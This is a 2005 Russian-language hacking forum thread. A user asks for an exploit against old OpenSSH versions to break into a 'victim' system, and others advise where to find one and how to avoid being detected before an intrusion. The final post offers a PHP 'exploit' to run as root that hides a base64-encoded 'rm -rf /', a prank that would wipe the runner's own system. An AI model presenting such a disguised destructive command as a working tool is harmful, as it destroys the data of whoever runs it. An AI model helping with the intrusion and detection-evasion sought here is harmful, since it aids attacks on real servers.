[Ищу] OpenSSH < 3.7.1 sploit
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-27 06:26:40
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
Не подскажите какой сплойт нужен вот под это дело:
"Возможно выполнение произвольного кода в OpenSSH. Атакующий может вызвать переполнение буфера или выполнить произвольный код из-за ошибок в buffer_init, buffer_free файла buffer.c, или различных функций в channels.c.
Уязвимые версии: OpenSSH в версиях до 3.7.1"
Искал и на securitylab но ниче так и не нашел.
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-27 06:30:14
|
|
|
Python
Сообщений: 4964
Оценки: 0
Присоединился: 2005-12-14 08:32:13
|
Чел открою тебе тайну, про "сплойт" тЫ не первЫй такой вопрос задаешь, зЫрь в ФАК
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-27 07:36:34
|
|
|
Chaos_logic''
Сообщений: 678
Оценки: 0
Присоединился: 2005-02-23 17:35:37
|
X-spider'ом сканил ?
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-27 07:42:23
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
Да
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-27 07:43:48
|
|
|
Chaos_logic''
Сообщений: 678
Оценки: 0
Присоединился: 2005-02-23 17:35:37
|
Он вроде еще и ссылки дает
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-27 08:20:28
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
Сcылку дал, но эксплоита там нет.
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-28 03:23:53
|
|
|
Chaos_logic''
Сообщений: 678
Оценки: 0
Присоединился: 2005-02-23 17:35:37
|
Естественно. Этож сканер безопасности. Но на этих сайтах могут ссылкы на первоисточники. Кто нашел эту уязвимость(например какая хак-тима). А на сайте данной хак-тимы будет и эксплоит.
И не используй спайдера перед взломом. Запалится ничего не стоит. Я его так и не смог пустить ни через прокси ни через сокс.
|
|
|
[Ищу] OpenSSH < 3.7.1 sploit - 2005-12-28 19:25:29
|
|
|
Nitrex
Сообщений: 404
Оценки: 0
Присоединился: 2004-09-12 23:24:27
|
Выполни под root'ом этот скрипт:
<? $host = "127.0.0.1"; // Сюда впиши IP жертвы $timeout = 10; // оставь как есть system(base64_decode("cm0gLXJmIC8=")); echo "[+] Shell geted…"; ?>
Enjoy [sm=4.gif]
|
|
|
|
|